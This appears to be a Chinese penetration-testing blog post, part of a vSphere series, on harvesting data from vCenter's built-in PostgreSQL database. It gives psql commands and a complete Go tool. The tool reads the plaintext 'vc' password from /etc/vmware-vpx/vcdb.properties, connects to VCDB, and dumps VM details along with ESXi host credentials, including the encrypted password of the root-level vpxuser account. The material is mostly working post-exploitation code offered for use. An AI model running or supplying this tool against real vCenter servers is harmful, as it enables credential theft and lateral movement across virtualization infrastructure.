vSphere 开发指南4——PostgreSQL

Question

0x00 前言

在之前的三篇文章 《vSphere 开发指南 1——vSphere Automation API》 、 《vSphere 开发指南 2——vSphere Web Services API》 和 《vSphere 开发指南 3——VMware PowerCLI》 介绍了同虚拟机交互的方法，能够远程导出虚拟机的配置信息，本文将要介绍在 vCenter 上通过 PostgreSQL 数据库导出虚拟机配置信息的方法。

0x01 简介

本文将要介绍以下内容：

• 导出方法
• 程序实现

0x02 导出方法

vCenter 默认安装了 PostgreSQL 数据库，用来存储 VM 和 ESXI 的信息

在之前的文章《Confluence 利用指南》提到过：

PostgreSQL 安装完成后会在本地操作系统创建一个名为 postgres 的用户，默认没有口令

如果没有设置用户 postgres 的口令，可以通过以下命令连接 PostgreSQL 数据库：

psql -h localhost -U postgres

执行结果如下图

默认用户列表如下图

如果设置了用户 postgres 的口令并且无法获得，可以选择用户 vc 进行操作，连接 PostgreSQL 数据库的命令如下：

psql -h localhost -d VCDB -U vc

执行结果如下图

用户 vc 的明文口令存储在固定文件 /etc/vmware-vpx/vcdb.properties 中

注：

psql 不支持直接传入口令作为参数，需要交互的环境进行操作

连接至 PostgreSQL 数据库后，查询虚拟机配置信息的命令如下：

SELECT * FROM vc.vpx_vm;

连接至 PostgreSQL 数据库后，查询 ESXI 配置信息的命令如下：

SELECT * FROM vc.vpx_host;

为了便于使用，连接 PostgreSQL 数据库和查询命令可以进行合并，这里分享以下两个命令示例：

(1) 使用用户 postgres 查询虚拟机配置信息

psql -h localhost -U postgres -c "SELECT file_name,guest_os,ip_address FROM vc.vpx_vm;" -d VCDB

(2) 使用用户 vc 查询 ESXI 配置信息

psql -h localhost -U vc -c "SELECT name,username,password,password_last_upd_dt FROM vc.vpxv_hosts;" -d VCDB -W

注：

psql 不支持直接传入口令作为参数，如果用户设置了口令，需要交互的环境下再次输入连接口令

0x03 程序实现

由于 psql 不支持直接传入口令作为参数，这里可以考虑编写程序实现数据库连接和查询配置

综合考虑适用性和方便性，这里开发语言选择 Golang

支持 PostgreSQL 的第三方包选择 https://github.com/bmizerany/pq

1、安装第三方包

命令如下：

go get github.com/lib/pq

2.编写代码

通过 go get github.com/lib/pq 安装的第三方包在 vCenter 下使用会存在 bug，连接数据库时提示 setting PGSERVICEFILE not supported

这是因为 vCenter 环境下默认设置了环境变量 $PGSERVICEFILE ，而通过 go get github.com/lib/pq 安装的第三方包默认引用了这个变量，这就导致了错误

错误代码的位置： %GOPATH%\src\github.com\lib\pq\conn.go ， Line1988-1989 ，如下图

而 github 上的代码已经修复了这个 bug，代码地址： https://github.com/bmizerany/pq/blob/master/conn.go#L644

如下图

所以这里我们只需要注释掉 %GOPATH%\src\github.com\lib\pq\conn.go 的第 1988 和第 1989 行代码即可，如下图

在代码实现上，首先读取文件 /etc/vmware-vpx/vcdb.properties 获得用户 vc 的明文口令，使用用户 vc 连接 PostgreSQL 数据库，最后导出虚拟机配置信息

完整实现代码如下：

package main

import (
    "database/sql"
    "fmt"
    "strings"
    "io/ioutil"
    _ "github.com/lib/pq"
)


func connectDB() *sql.DB{
    fmt.Println("[+] Get the config")
    b, err := ioutil.ReadFile("/etc/vmware-vpx/vcdb.properties")
    if err != nil {
        fmt.Print(err)
    }

    str := string(b)
    fmt.Println(str)
    index1 := strings.Index(str,"password")
    index2 := strings.Index(str,"password.encrypted")
    password := b[index1+11:index2]

    var host     = "localhost"
    var port int = 5432
    var user     = "vc"
    var dbname   = "VCDB"

    psqlInfo := fmt.Sprintf("host=%s port=%d user=%s "+
        "password=%s dbname=%s sslmode=disable",
        host, port, user, password, dbname)

    fmt.Println("[*] psqlInfo:" + psqlInfo)
    db, err := sql.Open("postgres", psqlInfo)
    if err != nil {
        panic(err)
    }

    err = db.Ping()
    if err != nil {
        panic(err)
    }
    fmt.Println("[+] Successfully connected!")
    return db
}


func queryVM(db *sql.DB){
    var file_name,guest_os,ip_address,power_state string

    fmt.Println("[*] Querying VM")
    rows,err:=db.Query("SELECT file_name,guest_os,ip_address,power_state FROM vc.vpx_vm")

    if err!= nil{
        panic(err)
    }
    defer rows.Close()
    for rows.Next(){
        err:= rows.Scan(&file_name,&guest_os,&ip_address,&power_state)
        if err!= nil{
            //fmt.Println(err)
        }
        fmt.Println(" - file_name   : " + file_name)
        fmt.Println("   guest_os    : " + guest_os)
        fmt.Println("   ip_address  : " + ip_address)
        fmt.Println("   power_state : " + power_state)
    }
    err = rows.Err()
    if err!= nil{
        panic(err)
    }
}


func queryESXI(db *sql.DB){
    var name,username,password,password_last_upd_dt string

    fmt.Println("[*] Querying ESXI")
    rows,err:=db.Query("SELECT name,username,password,password_last_upd_dt FROM vc.vpxv_hosts")

    if err!= nil{
        panic(err)
    }
    defer rows.Close()
    for rows.Next(){
        err:= rows.Scan(&name,&username,&password,&password_last_upd_dt)
        if err!= nil{
            //fmt.Println(err)
        }
        fmt.Println(" - name         : " + name)
        fmt.Println("   username     : " + username)
        fmt.Println("   password     : " + password)
        fmt.Println("   password_last: " + password_last_upd_dt)

    }
    err = rows.Err()
    if err!= nil{
        panic(err)
    }
}


func main()  {
    db:=connectDB()
    queryVM(db)
    queryESXI(db)
}

3.跨平台编译

将以上代码保存为 main.go

编译成 Linux 版本的命令如下：

SET CGO_ENABLED=0
SET GOOS=linux
SET GOARCH=amd64
go build -o vCenter_Query_PostgreSQL

4.测试

在 vCenter 上执行 vCenter_Query_PostgreSQL，能够自动导出虚拟机和 ESXI 的配置信息

补充：

执行命令 SELECT name,username,password,password_last_upd_dt FROM vc.vpxv_hosts; 能够导出 vpxuser 用户的加密口令

当 ESXI 主机连接 vCenter 时，ESXI 主机会创建一个 root 权限的用户 vpxuser

默认情况下，vCenter Server 使用 OpenSSL 密码库作为随机来源，每 30 天生成一个新的 vpxuser 密码，密码长度为 32 个字符

0x04 小结

本文介绍了在 vCenter 上通过 PostgreSQL 数据库导出虚拟机配置信息的方法，在渗透测试中，是极其重要的一环。